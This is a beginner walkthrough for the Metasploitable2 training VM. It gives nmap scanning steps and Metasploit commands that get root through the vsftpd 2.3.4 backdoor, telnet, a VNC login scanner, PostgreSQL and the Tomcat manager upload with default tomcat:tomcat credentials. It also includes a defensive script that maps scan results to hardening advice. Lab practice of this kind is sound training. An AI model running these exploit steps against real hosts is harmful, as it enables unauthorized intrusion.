Practice Live Virtual Machine: Metasploitable2 for Beginners : Walkthrough

 



Are you ready to practice ethical hacking and penetration testing?
Metasploitable2 is a vulnerable virtual machine designed specifically for training purposes. In this guide, we’ll show you how to set up Metasploitable2 easily on your system and start practicing various cybersecurity skills in a safe environment. Whether you’re a beginner or preparing for certification exams, mastering Metasploitable2 is a must!

Introduction:

Metasploitable2, developed by Rapid7, is an intentionally vulnerable virtual machine used as a target for practicing exploits against vulnerable systems. This walkthrough outlines the step-by-step process of exploiting different ports on Metasploitable2 for educational purposes.

Discovery Phase:

The default login credentials for the Metasploitable2 machine are `msfadmin:msfadmin`.

Figure 1: Metasploitable2 Machine

Identify the victim’s IP address using the `ifconfig` command.

Figure 2: ifconfig

Use Nmap from Kali Linux to scan for open ports on the Metasploitable2 machine:

Command: `sudo nmap -sV -Pn <Target/Victim Machine IP>`

Figure 3: nmap scanning
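
To read the same scan from the defender's side, the added example below (not part of the original post) parses `nmap -sV` output and flags the five services this walkthrough covers, with a hardening note for each. The sample output is constructed, and the names `parse_open_ports`, `triage` and `RULES` are hypothetical.

```python
import re

# Constructed sample of `nmap -sV -Pn` normal output (not captured from the
# original post); the version strings are illustrative.
SAMPLE_SCAN = """\
PORT     STATE    SERVICE    VERSION
21/tcp   open     ftp        vsftpd 2.3.4
22/tcp   open     ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open     telnet     Linux telnetd
3306/tcp filtered mysql
5432/tcp open     postgresql PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open     vnc        VNC (protocol 3.3)
8180/tcp open     http       Apache Tomcat/Coyote JSP engine 1.1
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

# (finding, pattern matched against "<service> <version>", hardening advice).
# Matching the banner, not the port, still catches Tomcat moved to 8180.
RULES = [
    ("vsftpd 2.3.4", r"^ftp .*vsftpd 2\.3\.4", "replace this vsftpd build or remove FTP"),
    ("telnet", r"^telnet ", "disable telnet; use SSH with key authentication"),
    ("vnc", r"^vnc ", "bind VNC to localhost and tunnel it; set a strong password"),
    ("postgresql", r"^postgresql ", "limit listen_addresses and pg_hba.conf to trusted hosts"),
    ("tomcat", r"Apache Tomcat", "change the tomcat:tomcat login; restrict the manager app"),
]

def parse_open_ports(scan_text):
    """Return (port, service, version) for every port nmap reports as open."""
    ports = []
    for line in scan_text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m and m.group(3) == "open":  # skip closed and filtered ports
            ports.append((int(m.group(1)), m.group(4), m.group(5).strip()))
    return ports

def triage(scan_text):
    """Map open services to the findings this walkthrough covers."""
    findings = []
    for port, service, version in parse_open_ports(scan_text):
        banner = f"{service} {version}"
        for name, pattern, advice in RULES:
            if re.search(pattern, banner):
                findings.append((port, name, advice))
    return findings

if __name__ == "__main__":
    for port, name, advice in triage(SAMPLE_SCAN):
        print(f"{port}/tcp  {name:<13} -> {advice}")
```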

 

1. FTP Exploitation (Port 21):

FTP (File Transfer Protocol) is a standard network protocol used for the transfer of files between a client and a server on a computer network. It enables the uploading and downloading of files, providing a simple way to share and manage data.

- Method 1: Establishing a connection using FTP credentials.

Command: `ftp 192.168.137.128`

Figure 4: FTP connection

- Method 2: Exploiting FTP through the Metasploit framework.

- Commands:

- `msfconsole`

Figure 5: msfconsole

- `search vsftpd`

Figure 6: vsftpd

- `use exploit/unix/ftp/vsftpd_234_backdoor`

- `set RHOSTS 192.168.137.128`

- `run`

Figure 7: Gained root access through FTP exploits.

 

 

2. Telnet Exploitation (Port 23):

Telnet is a simple, text-based network protocol that is used for accessing remote computers over TCP/IP networks like the Internet.

Connecting to Telnet using the command: `telnet 192.168.137.128`.

Figure 8: Root access is achieved via Telnet exploits.

 

3. VNC Exploitation (Port 5900):

Port 5900 is commonly associated with VNC (Virtual Network Computing), a remote desktop sharing system. When used in combination with VNC, port 5900 is often the default port for the initial display (desktop) on a VNC server. VNC allows a user to view and interact with the graphical desktop environment of a remote computer over a network.

- Utilizing Metasploit to exploit VNC login.

- Commands:

- `msfconsole`

- `search auxiliary/scanner/vnc/vnc_login`

- `set RHOST 192.168.137.128`

Figure 9: VNC exploit

- `vncviewer 192.168.137.128`

Figure 10: VNC pop-up window

Figure 11: Root access is secured through VNC exploits.

4. PostgreSQL Exploitation (Port 5432):

PostgreSQL is a powerful open-source relational database management system (RDBMS) known for its extensibility and advanced features, providing a robust platform for managing and querying structured data.

- Searching and exploiting PostgreSQL vulnerabilities.

- Commands:

- `msfconsole`

- `search PostgreSQL`

Figure 12: PostgreSQL

- `set RHOSTS 192.168.137.128`

- `set LHOST 192.168.137.129`

- `run`

Figure 13: PostgreSQL payload

Figure 14: Acquired root access via PostgreSQL exploits.

5. Apache Tomcat Exploitation (Port 8180):

Apache Tomcat is an open-source application server that executes Java servlets and JavaServer Pages, providing a robust environment for Java-based web applications. It serves as a reliable and scalable platform for deploying Java web applications.

- Searching for Apache Tomcat exploits in Metasploit.

- Commands:

- `msfconsole`

- `search apache tomcat`

Figure 15: search apache

- `use exploit/multi/http/tomcat_mgr_upload`

- `set RHOSTS 192.168.137.128`

- `set RPORT 8180`

- `set HttpPassword tomcat`

Figure 16: SET

- `set HttpUsername tomcat`

- `run`

Figure 17: Root access is attained through Apache Tomcat exploits.

 

 

 
